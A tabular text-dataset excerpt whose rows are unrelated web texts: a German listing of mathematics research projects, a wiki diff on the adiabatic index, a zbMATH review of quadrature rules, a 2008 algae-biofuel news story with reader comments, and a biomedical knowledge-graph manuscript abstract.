text
stringlengths 100
356k
|
---|
# Modelle und Approximationen
### Forschungsschwerpunkt C
Alsmeyer, Böhm, Dereich, Engwer, Friedrich, Hille, Holzegel (seit 2020), Huesmann, Jentzen, Kabluchko, Lohkamp, Löwe, Mukherjee, Ohlberger, Rave, Schedensack (bis 2019), F. Schindler, Schlichting (seit 2020), Seis, Stevens, Wilking, Wirth, Wulkenhaar, Zeppieri.
Anwendungen aus den Natur- und Lebenswissenschaften bestimmen die Herausforderungen in diesem Forschungsschwerpunkt. Dabei zielen wir auf die Entwicklung und Analyse von grundlegenden dynamischen und geometrischen Modellierungs- und Approximationsansätzen zur Beschreibung deterministischer und stochastischer Systeme ab. Wir untersuchen beispielsweise das Zusammenspiel von makroskopischen Strukturen mit zugrundeliegenden mikroskopischen Prozessen und deren jeweiligen topologischen und geometrischen Eigenschaften. Ein weiterer Fokus ist die Untersuchung, Ausnutzung und Optimierung der zugrundeliegenden Geometrie in mathematischen Modellen. Wir untersuchen strukturelle Verbindungen zwischen unterschiedlichen mathematischen Konzepten, wie z.B. zwischen Lösungsmannigfaltigkeiten von partiellen Differentialgleichungen und nicht-linearer Interpolation oder zwischen verschiedenen metrischen, variationellen oder mehrskaligen Konvergenzkonzepten für Geometrien. Speziell zielen wir auf die Charakterisierung kennzeichnender geometrischer Eigenschaften von mathematischen Modellen und deren Approximationen.
## Weitere Forschungsprojekte von Mitgliedern des Forschungsschwerpunkts C
$\bullet$ Christian Engwer: Personalised diagnosis and treatment for refractory focal paediatric and adult epilepsy (2021-2024)
$\bullet$ Benedikt Wirth: CRC 1450 A05 - Targeting immune cell dynamics by longitudinal whole-body imaging and mathematical modelling (2021-2024)
We develop strategies for tracking and quantifying (immune) cell populations or even single cells in long-term (days) whole-body PET studies in mice and humans. This will be achieved through novel acquisition protocols, measured and simulated phantom data, use of prior information from MRI and microscopy, mathematical modelling, and mathematical analysis of image reconstruction with novel regularization paradigms based on optimal transport. Particular applications include imaging and tracking of macrophages and neutrophils following myocardial ischemia-reperfusion or in arthritis and sepsis.
$\bullet$ Benedikt Wirth: CRC 1450 A06 - Improving intravital microscopy of inflammatory cell response by active motion compensation using controlled adaptive optics (2021-2024)
We will advance multiphoton fluorescence microscopy by developing a novel optical module comprised of a high-speed deformable mirror that will actively compensate tissue motion during intravital imaging, for instance due to heart beat (8 Hz), breathing (3 Hz, in mm-range) or peristaltic movement of the gut in mice. To control this module in real-time, we will develop mathematical methods that track and predict tissue deformation. This will allow imaging of inflammatory processes at cellular resolution without mechanical tissue fixation.
$\bullet$ Caterina Zeppieri: SPP 2256: Variational Methods for Predicting Complex Phenomena in Engineering Structures and Materials - Subproject: Variational modelling of fracture in high-contrast microstructured materials: mathematical analysis and computational mechanics (2020-2023)
After the seminal work of Francfort and Marigo, free-discontinuity functionals of Mumford-Shah type have been established as simplified and yet relevant mathematical models to study fracture in brittle materials. For finite-contrast constituents, the homogenisation of brittle energies is by-now well-understood and provides a rigorous micro-to-macro upscaling for brittle fracture.Only recently, explicit high-contrast brittle microstructures have been provided, which show that, already for simple free-discontinuity energies of Mumford-Shah type, the high-contrast nature of the constituents can induce a complex effective behaviour going beyond that of the single constituents. In particular, macroscopic cohesive-zone models and damage models can be obtained by homogenising purely brittle microscopic energies with high-contrast coefficients. In this framework, the simple-to-complex transition originates from a microscopic bulk-surface energy-coupling which is possible due to the degeneracy of the functionals.Motivated by the need to understand the mathematical foundations of mechanical material-failure and to develop computationally tractable numerical techniques, the main goal of this project is to characterise all possible materials which can be obtained by homogenising simple high-contrast brittle materials. In mathematical terms, this amounts to determine the variational-limit closure of the set of high-contrast free-discontinuity functionals. This problem has a long history in the setting of elasticity, whereas is far less understood if fracture is allowed.For the variational analysis it will be crucial to determine novel homogenisation formulas which “quantify” the microscopic bulk-surface energy-coupling. Moreover, the effect of high-contrast constituents on macroscopic anisotropy will be investigated by providing explicit microstructures realising limit models with preferred crack-directions.The relevant mathematical tools will come from the Calculus of Variations and Geometric Measure Theory. Along the way, new ad hoc extension and approximation results for SBV-functions will be established. The latter will be of mathematical interest in their own right, and appear to be widely applicable in the analysis of scale-dependent free-discontinuity problems.The computational mechanics results will build upon the mathematical theory, and will complement it with relevant insights when the analysis becomes impracticable. High performance fast Fourier transform and adaptive tree-based computational methods will be developed to evaluate the novel cell formulas. The identified damage and cohesive-zone models will be transferred to simulations on component scale.The findings are expected to significantly enhance the understanding of the sources and mechanisms of material-failure and to provide computational tools for identifying anisotropic material-models useful for estimating the strength of industrial components.
$\bullet$ Christoph Böhm, Burkhard Wilking: CRC 1442: Geometry: Deformation and Rigidity - Geometric evolution equations (2020-2024)
Hamilton’s Ricci flow is a geometric evolution equation on the space of Riemannian metrics of a smooth manifold. In a first subproject we would like to show a differentiable stability result for noncollapsed converging sequences of Riemannian manifolds with nonnegative sectional curvature, generalising Perelman’s topological stability. In a second subproject, next to classifying homogeneous Ricci solitons on non-compact homogeneous spaces, we would like to prove the dynamical Alekseevskii conjecture. Finally, in a third subproject we would like to find new Ricci flow invariant curvature conditions, a starting point for introducing a Ricci flow with surgery in higher dimensions.
$\bullet$ Raimar Wulkenhaar: CRC 1442: Geometry: Deformation and Rigidity - D03: Integrability (2020-2024)
The project investigates a novel integrable system which arises from a quantum field theory on noncommutative geometry. It is characterised by a recursive system of equations with conjecturally rational solutions. The goal is to deduce their generating function and to relate the rational coefficients in the generating function to intersection numbers of tautological characteristic classes on some moduli space.
$\bullet$ Michael Wiemeler, Burkhard Wilking: CRC 1442: Geometry: Deformation and Rigidity - B01: Curvature and Symmetry (2020-2024)
The question of how far geometric properties of a manifold determine its global topology is a classical problem in global differential geometry. In a first subproject we study the topology of positively curved manifolds with torus symmetry. We think that the methods used in this subproject can also be used to attack the Salamon conjecture for positive quaternionic Kähler manifolds. In a third subproject we study fundamental groups of non-negatively curved manifolds. Two other subprojects are concerned with the classification of manifolds all of whose geodesics are closed and the existence of closed geodesics on Riemannian orbifolds.
$\bullet$ Manuel Friedrich: Variational Modeling of Molecular Geometries (2020-2023)
Wider research context: Driven by their fascinating electronic and mechanical properties, research on low-dimensional materials (such as graphene) is exponentially growing. New findings are emerging at an always increasing pace, ranging from fundamental concepts to applications. In contrast to the wealth of experimental and numerical evidence currently available, rigorous mathematical results on local and global crystalline geometries are scant and the study of the emergence of different scales within molecular structures is still in its infancy. Objectives: We focus on the variational modeling of molecular geometries within the frame of Molecular Mechanics: effective configurations are identified as minimizers of classical configurational potentials. The project aims at obtaining new mathematical understanding of molecular geometries and at investigating the emergence of scale effects across scales.Approach: Ranging from the nano to the macroscale, we address crystallization for molecular compounds, the description of local molecular features including defects and rigidity, the occurrence of global geometric characteristics such as flatness in 3d and stratification, and the passage from discrete to continuum theories. Grounded on variational methods for atomistic models, the methodology will integrate techniques from discrete mathematics and stochastics as well.Innovation: The project targets a number of hot research fronts in Materials Science from the rigorous mathematical standpoint. Compared with simulations, the theoretical approach bears the advantage of being system-size independent, a crucial asset for investigating effects across scales.Researchers involved: The new international research team between Münster and Vienna will be coordinated by Manuel Friedrich and Ulisse Stefanelli and will benefit from a network of local and international collaborators, including experimental and computational groups.
$\bullet$ Mario Ohlberger, Felix Schindler: ML-MORE: Machine learning and model order reduction to predict the efficiency of catalytic filters. Subproject 1: Model Order Reduction (2020-2023)
Reaktiver Stofftransport in porösen Medien in Verbindung mit katalytischen Reaktionen ist die Grundlage für viele industrielle Prozesse und Anlagen, wie z.B. Brennstoffzellen, Photovoltaikzellen, katalytische Filter für Abgase, etc. Die Modellierung und Simulation der Prozesse auf der Porenskala kann bei der Optimierung des Designs von katalytischen Komponenten und der Prozessführung helfen, ist jedoch derzeit dadurch eingeschränkt, dass solche Simulationen zu grossen Datenmengen führen, zeitaufwändig sind und von einer grossen Anzahl von Parametern abhängen. Außerdem werden auf diese Weise die im Laufe der Jahre gesammelten Versuchsdaten nicht wiederverwendet. Die Entwicklung von Lösungsansätzen für die Vorhersage der chemischen Konversionsrate mittels moderner datenbasierter Methoden des Maschinellen Lernens (ML) ist essenziell, um zu schnellen, zuverlässigen prädiktiven Modellen zu gelangen. Hierzu sind verschiedene Methodenklassen erforderlich. Neben den experimentellen Daten sind voll aufgelöste Simulationen auf der Porenskala notwendig. Diese sind jedoch zu teuer, um einen umfangreichen Satz an Trainingsdaten zu generieren. Daher ist die Modellordnungsreduktion (MOR) zur Beschleunigung entscheidend. Es werden reduzierte Modelle fur den betrachteten instationären reaktiven Transport entwickelt, um große Mengen an Trainingsdaten zu simulieren. Als ML-Methodik werden mehrschichtige Kern-basierte Lernverfahren entwickelt, um die heterogenen Daten zu kalibrieren und nichtlineare prädiktive Modelle zur Effizienzvorhersage zu entwickeln.Hierbei werden große Daten (bzgl. Dimensionalität und Sample-Zahl) zu behandeln sein, was Datenkompression und Parallelisierung des Trainings erfordern wird. Das Hauptziel des Projekts ist es, alle oben genannten Entwicklungen in einem prädiktiven ML-Tool zu integrieren, das die Industrie bei der Entwicklung neuer katalytischer Filter unterstützt und auf viele andere vergleichbare Prozesse übertragbar ist.
$\bullet$ Christian Seis: Transport Equations, mixing and fluid dynamics (2020-2023)
Advection-diffusion equations are of fundamental importance in many areas of science. They describe systems, in which a quantity is simultaneously diffused and advected by a velocity field. In many applications these velocity fields are highly irregular. In this project, several quantitative aspects shall be investigated. One is related to mixing properties in fluids caused by shear flows. The interplay between the transport by the shear flow and the regularizing diffusion leads after a certain time, to the emergence of a dominant length scales which persist during the subsequent evolution and determine mixing rates. A rigorous understanding of these phenomena is desired. In addition, stability estimates for advection-diffusion equations will be derived. These shall give a deep insight into how solutions depend on coefficients and data. The new results shall subsequently be applied to estimate the error generated by numerical finite volume schemes approximating the model equations.
$\bullet$ Christian Engwer: HyperCut – Stabilized DG schemes for hyperbolic conservation laws on cut cell meshes (2020-2022)
The goal of this project is to develop new tools for solving time-dependent, first order hyperbolic conservation laws, in particular the compressible Euler equations, on complex shaped domains.In practical applications, mesh generation is a major issue. When dealing with complicated geometries, the construction of corresponding body-fitted meshes is a very involved and time-consuming process.In this proposal, we will consider a different approach: In the last two decades so called cut cell methods have gained a lot of interest, as they reduce the burden of the meshing process. The idea is to simply cut the geometry out of a Cartesian background mesh. Theresulting cut cells can have various shapes and are not bounded from below in size. Compared to body-fitted meshes, this approach is fully automatic and much cheaper. However, standard explicit schemes are typically not stable when the time step is chosen with respect to the background mesh and does not reflect the size of small cut cells. Thisis referred to as the small cell problem.In the setting of standard meshes, both Finite Volume (FV) and Discontinuous Galerkin (DG) methods have been used successfully for solving non-linear hyperbolic conservation laws. For FV schemes, there already exist several approaches for extending thesemethods to cut cell meshes and overcoming the small cell problem while keeping the explicit time stepping. For DG schemes, this is not the case.The goal of this proposal is to develop stable DG schemes for solving time-dependent hyperbolic conservation laws, in particular the compressible Euler equations, on cut cell meshes using explicit time stepping.We particularly aim at a method that(1) solves the small cell problem and permits explicit time stepping,(2) preserves mass conservation,(3) is high-order along the cut cell boundary, where many important quantities are evaluated,(4) satisfies theoretical properties such as monotonicity and TVDM stability for model problems,(5) works for non-linear hyperbolic conservation laws, in particular the compressible Euler equations,(6) is robust in the presence of shocks or discontinuities,(7) and sufficiently simple to be implemented in higher dimensions.We base the spatial discretization on a DG approach to enable high accuracy. We plan to develop new stabilization terms to overcome the small cell problem for this setup. The starting point for this proposal is our recent publication for stabilizing a DG discretizationfor linear advection using piecewise linear polynomials. We will extend these results in different directions, namely to non-linear problems, including the compressible Euler equations, and to higher order, in particular to piecewise quadratic polynomials.We will implement these methods using the software framework DUNE and publish our code as open-source.
$\bullet$ Raimar Wulkenhaar: GRK 2149 - Starke und schwache Wechselwirkung - von Hadronen zu Dunkler Materie (2020-2024)
The Research Training Group (Graduiertenkolleg) 2149 "Strong and Weak Interactions - from Hadrons to Dark Matter" funded by the Deutsche Forschungsgemeinschaft focuses on the close collaboration of theoretical and experimental nuclear, particle and astroparticle physicists further supported by a mathematician and a computer scientist. This explicit cooperation is of essence for the PhD topics of our Research Training Group.Scientifically this Research Training Group addresses questions at the forefront of our present knowledge of particle physics. In strong interactions we investigate questions of high complexity, such as the parton distributions in nuclear matter, the transition of the hot quark-gluon plasma into hadrons, or features of meson decays and spectroscopy. In weak interactions we pursue questions, which are by definition more speculative and which go beyond the Standard Model of particle physics, particularly with regard to the nature of dark matter. We will confront theoretical predictions with direct searches for cold dark matter particles or for heavy neutrinos as well as with new particle searches at the LHC.The pillars of our qualification programme are individual supervision and mentoring by one senior experimentalist and one senior theorist, topical lectures in physics and related fields (e.g. advanced computation), peer-to-peer training through active participation in two research groups, dedicated training in soft skills, and the promotion of research experience in the international community. We envisage early career steps through a transfer of responsibilities and international visibility with stays at external partner institutions. An important goal of this Research Training Group is to train a new generation of scientists, who are not only successful specialists in their fields, but who have a broader training both in theoretical and experimental nuclear, particle and astroparticle physics.
$\bullet$ Caterina Zeppieri: Homogenisation and elliptic approximation of random free-discontinuity functionals (2020-2022)
Composite materials posses an incredibly complex microstructure. To reduce this complexity, in materials modelling reasonable idealizations have to be considered. Random composite materials represent a relevant class of such idealizations. Motivated by primary questions arising in the variational theory of fracture, the goal of this project is to study the large-scale behavior of random elastic composites which can undergo fracture. Mathematically this amounts to develop a qualitative theory of stochastic homogenization for free-discontinuity functionals. This will be done by combining two approaches: a "direct" approach and an "indirect" approximation-approach. The direct approach consists in extending the classical theory to the BV-setting. The approximation-approach, instead, consists in proposing suitable elliptic phase-field approximations of random free-discontinuity functionals which can provide regular-approximations of the homogenized coefficients.
$\bullet$ Benedikt Wirth: Mathematische Rekonstruktion und Modellierung der CAR T-Zell Verteilung in vivo in einem Tumormodell (2019-2023)
$\bullet$ Arnulf Jentzen, Benno Kuckuck: Mathematical Theory for Deep Learning (2019-2024)
It is the key goal of this project to provide a rigorous mathematical analysis for deep learning algorithms and thereby to establish mathematical theorems which explain the success and the limitations of deep learning algorithms. In particular, this projects aims (i) to provide a mathematical theory for high-dimensional approximation capacities for deep neural networks, (ii) to reveal suitable regular sequences of functions which can be approximated by deep neural networks but not by shallow neural networks without the curse of dimensionality, and (iii) to establish dimension independent convergence rates for stochastic gradient descent optimization algorithms when employed to train deep neural networks with error constants which grow at most polynomially in the dimension.
$\bullet$ Arnulf Jentzen: Existence, uniqueness, and regularity properties of solutions of partial differential equations (2019-2024)
The goal of this project is to reveal existence, uniqueness, and regularity properties of solutions of partial differential equations (PDEs). In particular, we intend to study existence, uniqueness, and regularity properties of viscosity solutions of degenerate semilinear Kolmogorov PDEs of the parabolic type. We plan to investigate such PDEs by means of probabilistic representations of the Feynman-Kac type. We also intend to study the connections of such PDEs to optimal control problems.
$\bullet$ Arnulf Jentzen: Regularity properties and approximations for stochastic ordinary and partial differential equations with non-globally Lipschitz continuous nonlinearities (2019-2024)
A number of stochastic ordinary and partial differential equations from the literature (such as, for example, the Heston and the 3/2-model from financial engineering, (overdamped) Langevin-type equations from molecular dynamics, stochastic spatially extended FitzHugh-Nagumo systems from neurobiology, stochastic Navier-Stokes equations, Cahn-Hilliard-Cook equations) contain non-globally Lipschitz continuous nonlinearities in their drift or diffusion coefficients. A central aim of this project is to investigate regularity properties with respect to the initial values of such stochastic differential equations in a systematic way. A further goal of this project is to analyze the regularity of solutions of the deterministic Kolmogorov partial dfferential equations associated to such stochastic differential equations. Another aim of this project is to analyze weak and strong convergence and convergence rates of numerical approximations for such stochastic differential equations.
$\bullet$ Arnulf Jentzen: Overcoming the curse of dimensionality: stochastic algorithms for high-dimensional partial differential equations (2019-2024)
Partial differential equations (PDEs) are among the most universal tools used in modeling problems in nature and man-made complex systems. The PDEs appearing in applications are often high dimensional. Such PDEs can typically not be solved explicitly and developing efficient numerical algorithms for high dimensional PDEs is one of the most challenging tasks in applied mathematics. As is well-known, the difficulty lies in the so-called ''curse of dimensionality'' in the sense that the computational effort of standard approximation algorithms grows exponentially in the dimension of the considered PDE. It is the key objective of this research project to overcome this curse of dimensionality and to construct and analyze new approximation algorithms which solve high dimensional PDEs with a computational effffort that grows at most polynomially in both the dimension of the PDE and the reciprocal of the prescribed approximation precision.
$\bullet$ Benedikt Wirth: SPP 1962: Non-smooth and Complementarity-Based Distributed Parameter Systems: Simulation and Hierarchical Optimization - SP: Non-smooth and non-convex optimal transport problems (2019-2022)
In recent years a strong interest has developed within mathematics in so-called "branched Transport" models, which allow to describe transportation networks as they occur in road systems, river basins, communication networks, vasculature, and many other natural and artificial contexts. As in classical optimal transport, an amount of material needs to be transported efficiently from a given initial to a final mass distribution. In branched transport, however, the transportation cost is not proportional, but subadditive in the transported mass, modelling an increased transport efficiency if mass is transported in bulk. This automatically favours transportation schemes in which the mass flux concentrates on a complicated, ramified network of one-dimensional lines. The branched transport problem is an intricate nonconvex, nonsmooth variational problem on Radon measures (in fact on normal currents) that describe the mass flux. Various different formulations were developed and analysed (including work by the PIs), however, they all all take the viewpoint of geometric measure theory, working with flat chains, probability measures on the space of Lipschitz curves, or the like. What is completely lacking is an optimization and optimal control perspective (even though some ideas of optimization shimmer through in the existing variational arguments such as regularity analysis via necessary optimality conditions or the concept of calibrations which are related to dual optimization variables). This situation is also reflected in the fact that the field of numerics for branched transport is rather underdeveloped and consists of ad hoc graph optimization methods for special cases and two-dimensional phase field approximations. We will reformulate branched transport in the framework of optimization and optimal control for Radon measures, work out this optimization viewpoint in the variational analysis of branched transport networks, and exploit the results in novel numerical approaches. The new perspective will at the same time help variational analysts, advance the understanding of nonsmooth, nonconvex optimization problems on measures, and provide numerical methods to obtain efficient transport networks.
$\bullet$ Mario Ohlberger, Felix Schindler, Tim Keil: Localized Reduced Basis Methods for PDE-constrained Parameter Optimization (2019-2021)
This projects is concerned with model reduction for parameter optimization of nonlinear elliptic partial differential equations (PDEs). The goal is to develop a new paradigm for PDE-constrained optimization based on adaptive online enrichment. The essential idea is to design a localized version of the reduced basis (RB) method which is called Localized Reduced Basis Method (LRBM).
$\bullet$ Benedikt Wirth: Nonlocal Methods for Arbitrary Data Sources (2018-2022)
In NoMADS we focus on data processing and analysis techniques which can feature potentially very complex, nonlocal, relationships within the data. In this context, methodologies such as spectral clustering, graph partitioning, and convolutional neural networks have gained increasing attention in computer science and engineering within the last years, mainly from a combinatorial point of view. However, the use of nonlocal methods is often still restricted to academic pet projects. There is a large gap between the academic theories for nonlocal methods and their practical application to real-world problems. The reason these methods work so well in practice is far from fully understood.
Our aim is to bring together a strong international group of researchers from mathematics (applied and computational analysis, statistics, and optimisation), computer vision, biomedical imaging, and remote sensing, to fill the current gaps between theory and applications of nonlocal methods. We will study discrete and continuous limits of nonlocal models by means of mathematical analysis and optimisation techniques, resulting in investigations on scale-independent properties of such methods, such as imposed smoothness of these models and their stability to noisy input data, as well as the development of resolution-independent, efficient and reliable computational techniques which scale well with the size of the input data. As an overarching applied theme we focus in particular on image data arising in biology and medicine, which offers a rich playground for structured data processing and has direct impact on society, as well as discrete point clouds, which represent an ambitious target for unstructured data processing. Our long-term vision is to discover fundamental mathematical principles for the characterisation of nonlocal operators, the development of new robust and efficient algorithms, and the implementation of those in high quality software products for real-world application.
$\bullet$ Mario Ohlberger, Stephan Rave, Marie Christin Tacke: Modellbasierte Abschätzung der Lebensdauer von gealterten Li-Batterien für die 2nd Life Anwendung als stationärer Stromspeicher (2018-2021)
|
# Ratio of specific heats
(Difference between revisions)
Revision as of 10:11, 12 September 2005 (view source)Praveen (Talk | contribs)← Older edit Revision as of 10:52, 12 September 2005 (view source)Jola (Talk | contribs) mNewer edit → Line 1: Line 1: - The ratio of specific heats (also known as ''adiabatic index''), usually denoted by $\gamma$ is the ratio of specific heat at constant pressure to the specific heat at constant volume + The ratio of specific heats (also known as ''adiabatic index''), usually denoted by $\gamma$, is the ratio of specific heat at constant pressure to the specific heat at constant volume. - $+ :[itex] - \gamma = \frac{C_p}{C_v} + \gamma \equiv \frac{C_p}{C_v}$ [/itex] - The adiabatic index always exceeds unity; for a polytropic gas it is constant. For monatomic gas $\gamma=5/3$, and for diatomic gases $\gamma=7/5$, at ordinary temperatures. For air its value is close to that of a diatomic gas, 7/5. + The adiabatic index always exceeds unity; for a polytropic gas it is constant. For monatomic gas $\gamma=5/3$, and for diatomic gases $\gamma=7/5$, at ordinary temperatures. For air its value is close to that of a diatomic gas, 7/5 = 1.4. + + Sometimes $\kappa$ is used instead of $\gamma$ to denote the specific heat ratio.
## Revision as of 10:52, 12 September 2005
The ratio of specific heats (also known as adiabatic index), usually denoted by $\gamma$, is the ratio of specific heat at constant pressure to the specific heat at constant volume.
$\gamma \equiv \frac{C_p}{C_v}$
The adiabatic index always exceeds unity; for a polytropic gas it is constant. For monatomic gas $\gamma=5/3$, and for diatomic gases $\gamma=7/5$, at ordinary temperatures. For air its value is close to that of a diatomic gas, 7/5 = 1.4.
Sometimes $\kappa$ is used instead of $\gamma$ to denote the specific heat ratio.
|
# zbMATH — the first resource for mathematics
##### Examples
Geometry Search for the term Geometry in any field. Queries are case-independent. Funct* Wildcard queries are specified by * (e.g. functions, functorial, etc.). Otherwise the search is exact. "Topological group" Phrases (multi-words) should be set in "straight quotation marks". au: Bourbaki & ti: Algebra Search for author and title. The and-operator & is default and can be omitted. Chebyshev | Tschebyscheff The or-operator | allows to search for Chebyshev or Tschebyscheff. "Quasi* map*" py: 1989 The resulting documents have publication year 1989. so: Eur* J* Mat* Soc* cc: 14 Search for publications in a particular source with a Mathematics Subject Classification code (cc) in 14. "Partial diff* eq*" ! elliptic The not-operator ! eliminates all results containing the word elliptic. dt: b & au: Hilbert The document type is set to books; alternatively: j for journal articles, a for book articles. py: 2000-2015 cc: (94A | 11T) Number ranges are accepted. Terms can be grouped within (parentheses). la: chinese Find documents in a given language. ISO 639-1 language codes can also be used.
##### Operators
a & b logic and a | b logic or !ab logic not abc* right wildcard "ab c" phrase (ab c) parentheses
##### Fields
any anywhere an internal document identifier au author, editor ai internal author identifier ti title la language so source ab review, abstract py publication year rv reviewer cc MSC code ut uncontrolled term dt document type (j: journal article; b: book; a: book article)
Stable high-order quadrature rules with equidistant points. (English) Zbl 1170.65016
Newton-Cotes quadrature rules become unstable for high orders. In this paper, the author reviews two techniques to construct stable high-order quadrature rules using $N$ equidistant quadrature points. The first method is based on results of M. W. Wilson [Math. Comput. 24, 271–282 (1970; Zbl 0219.65028)]. The second approach uses nonnegative least squares methods of C. L. Lawson and R. J. Hanson [Solving least squares problems, SIAM Philadelphia (1995; Zbl 0860.65029)]. The stability follows from the fact that all weights are positive. These results can be achieved in the case $N\sim {d}^{2}$, where $d$ is the polynomial order of accuracy. Then the computed approximation corresponds implicitly to the integral of a (discrete) least squares approximation of the (sampled) integrand. The author shows how the underlying discrete least squares approximation can be optimized for the numerical integration. Numerical tests are presented.
##### MSC:
65D32 Quadrature and cubature formulas (numerical methods) 41A55 Approximate quadratures 42C05 General theory of orthogonal functions and polynomials 65F20 Overdetermined systems, pseudoinverses (numerical linear algebra)
|
## Sapphire Energy Introduces Algae-Derived Bio-Gasoline
##### 29 May 2008
Start-up algal biofuels company Sapphire Energy unveiled a renewable 91 octane gasoline that conforms to ASTM certification derived from algal a biocrude.
Sapphire has developed a platform that produces a “green crude” and biohydrocarbon fuels from modified algae. Sapphire’s founders and leadership team includes scientists in the fields of petroleum chemistry, biotechnology, algal production, plant genomics, and biogenetics.
Brian Goodall, Sapphire’s new vice president of downstream technology, was most recently at Imperium Renewables, where his team there recently delivered the 1,000 gallons of biojet fuel used on Virgin Atlantic’s first-ever commercial “green” jet flight. (Earlier post.)
The one-year old San Diego, California-based Sapphire has already gathered $50 million in funding from investors, including ARCH Venture Partners, the Wellcome Trust, and Venrock. Sapphire’s scientific supporters include Scripps Research Institute; University of California, San Diego; the University of Tulsa, and the Department of Energy’s Joint Genome Project. ### Comments This sounds doggone promising if their claims can be believed. I checked out there website. They have a lot of impressive resume's, but I wonder the cost of building the algae farms, etc.? Does their plan sound feasible to anyone out there? Music to my ears. And they're local to me. C'mon, let's get this stuff to market! Too bad it's already been shown that algal bio-fuels should be scrapped because they can't be done economically. ... wait a minute ... that was at 30$ a barrel. Holy profit margin Batman!
If you can grow algae hydroponically (i.e. nutrient solutions without need for soil) in areas where land and soil conditions aren't conducive to farming for corn or wheat, this would be a good answer to the biofuels versus people-food problem.
Sewage would be an excellent source of nutrients. Is there not at least one company trying to use it?
there are a couple other companies looking at waste water Blue Marble Energy has been for quite some time now as well as Aquaflow.
Sapphires method for conversion will be the standard on how to convert algae to energy the notion of oil extraction from algae will be dead in the water so to speak within a year, I could be wrong but essentially that would the foolish method to pursue.
On another note Sapphire just appears to be one of the first to market but they are not the only ones looking at bio-crude conversions more will soon follow.
The question really is, how much can they produce per day.. What is the EROI? The new stories did nothing to answer these fundamental questions.
Shouldn't they focus on a diesel fuel replacement first? All the other algae research seems to come to the conclusion that is the most viable use.
Once again, no speciifs: amount of land or quality required per litre. Experimentation with jatropha genome mapping sounds more promising.
Take a problem
Turn it into an asset
Make money doing it.
Sounds win win win to me.
Lots of impressive cred from the players. Now to see if they can build a pilot that actually works. While this appears to be a great thing - I wonder how well they've done their homework on building a fuel for a decreasing need? As ESSUs sophisticate the need to drop by the neighborhood Esso station rapidly decrease. And while there will always be a need for liquid fuels, gasoline - green or otherwise will steadily decline compared to jet fuel and diesel.
Even so, it appears that algae is *finally* having its day in the um, sunlight. Thanks in part to the "innovative" work of DOE's Aquatic Species study a while ago.
I just hope none of the GM organisms turn out to like human flesh as much as CO2 and sunlight.
These guys better get a move on. At the rate my heating oil is going up, I may need to take out a second house loan to fill my fuel tank.
Regarding funding to get this project going...
Imagine if they were an NFL team threatening to move out of town...the state govt. and local officials would be on DefCon Three panicking and throwing 200 mil plus at them ...not to mention tax breaks out the wazoo to build them a new playpen and keep the unwashed amused in the fall...Why isnt the state taking the lead with this and doing as we did in WW2? In months factories went from toothpaste and lawn mowers to grenades and bayonets etc. It didnt take 10 years and it wont if we get on it now!
Where is the sense of urgency?
Yes I know this is a high tech issue but the point is the same...where is the will to bear the burden to win??
Regarding funding to get this project going...
Imagine if they were an NFL team threatening to move out of town...the state govt. and local officials would be on DefCon Three panicking and throwing 200 mil plus at them ...not to mention tax breaks out the wazoo to build them a new playpen and keep the unwashed amused in the fall...Why isnt the state taking the lead with this and doing as we did in WW2? In months factories went from toothpaste and lawn mowers to grenades and bayonets etc. It didnt take 10 years and it wont if we get on it now!
Where is the sense of urgency?
Yes I know this is a high tech issue but the point is the same...where is the will to bear the burden to win??
Regarding funding to get this project going...
Imagine if they were an NFL team threatening to move out of town...the state govt. and local officials would be on DefCon Three panicking and throwing 200 mil plus at them ...not to mention tax breaks out the wazoo to build them a new playpen and keep the unwashed amused in the fall...Why isnt the state taking the lead with this and doing as we did in WW2? In months factories went from toothpaste and lawn mowers to grenades and bayonets etc. It didnt take 10 years and it wont if we get on it now!
Where is the sense of urgency?
Yes I know this is a high tech issue but the point is the same...where is the will to bear the burden to win??
Regarding funding to get this project going...
Imagine if they were an NFL team threatening to move out of town...the state govt. and local officials would be on DefCon Three panicking and throwing 200 mil plus at them ...not to mention tax breaks out the wazoo to build them a new playpen and keep the unwashed amused in the fall...Why isnt the state taking the lead with this and doing as we did in WW2? In months factories went from toothpaste and lawn mowers to grenades and bayonets etc. It didnt take 10 years and it wont if we get on it now!
Where is the sense of urgency?
Yes I know this is a high tech issue but the point is the same...where is the will to bear the burden to win??
this would be a great help to mankind.
SIR,
Iam a student of B.Tech-M.Tech Int. in converging technologies at Centre for Converging Technologies,University of Rajasthan,Jaipur,India.
Iam making a project on this.I request you to please send me-"How can we take out energy from algae?"
this would be a great help to mankind.
SIR,
Iam a student of B.Tech-M.Tech Int. in converging technologies at Centre for Converging Technologies,University of Rajasthan,Jaipur,India.
Iam making a project on this.I request you to please send me-"How can we take out energy from algae?"
We have heard the talk, now where is product, where can I get 25 gallens to try, I see nothing but research, research, lets go folks we need to stop the cash drain on forgien oil,
The comments to this entry are closed.
|
# Expanding a Database-derived Biomedical Knowledge Graph via Multi-relation Extraction from Biomedical Abstracts
A DOI-citable version of this manuscript is available at https://doi.org/10.1101/730085.
This manuscript (permalink) was automatically generated from greenelab/text_mined_hetnet_manuscript@1149d5d on January 29, 2020.
## Authors
• David N. Nicholson
0000-0003-0002-5761 · danich1
Department of Systems Pharmacology and Translational Therapeutics, University of Pennsylvania · Funded by GBMF4552
• Daniel S. Himmelstein
0000-0002-3012-7446 · dhimmel · dhimmel
Department of Systems Pharmacology and Translational Therapeutics, University of Pennsylvania · Funded by GBMF4552
• Casey S. Greene
0000-0001-8713-9213 · cgreene · GreeneScientist
Department of Systems Pharmacology and Translational Therapeutics, University of Pennsylvania · Funded by GBMF4552 and R01 HG010067
## Abstract
Knowledge graphs support multiple research efforts by providing contextual information for biomedical entities, constructing networks, and supporting the interpretation of high-throughput analyses. These databases are populated via some form of manual curation, which is difficult to scale in the context of an increasing publication rate. Data programming is a paradigm that circumvents this arduous manual process by combining databases with simple rules and heuristics written as label functions, which are programs designed to automatically annotate textual data. Unfortunately, writing a useful label function requires substantial error analysis and is a nontrivial task that takes multiple days per function. This makes populating a knowledge graph with multiple nodes and edge types practically infeasible. We sought to accelerate the label function creation process by evaluating the extent to which label functions could be re-used across multiple edge types. We used a subset of an existing knowledge graph centered on disease, compound, and gene entities to evaluate label function re-use. We determined the best label function combination by comparing a baseline database-only model with the same model but added edge-specific or edge-mismatch label functions. We confirmed that adding additional edge-specific rather than edge-mismatch label functions often improves text annotation and shows that this approach can incorporate novel edges into our source knowledge graph. We expect that continued development of this strategy has the potential to swiftly populate knowledge graphs with new discoveries, ensuring that these resources include cutting-edge results.
## Introduction
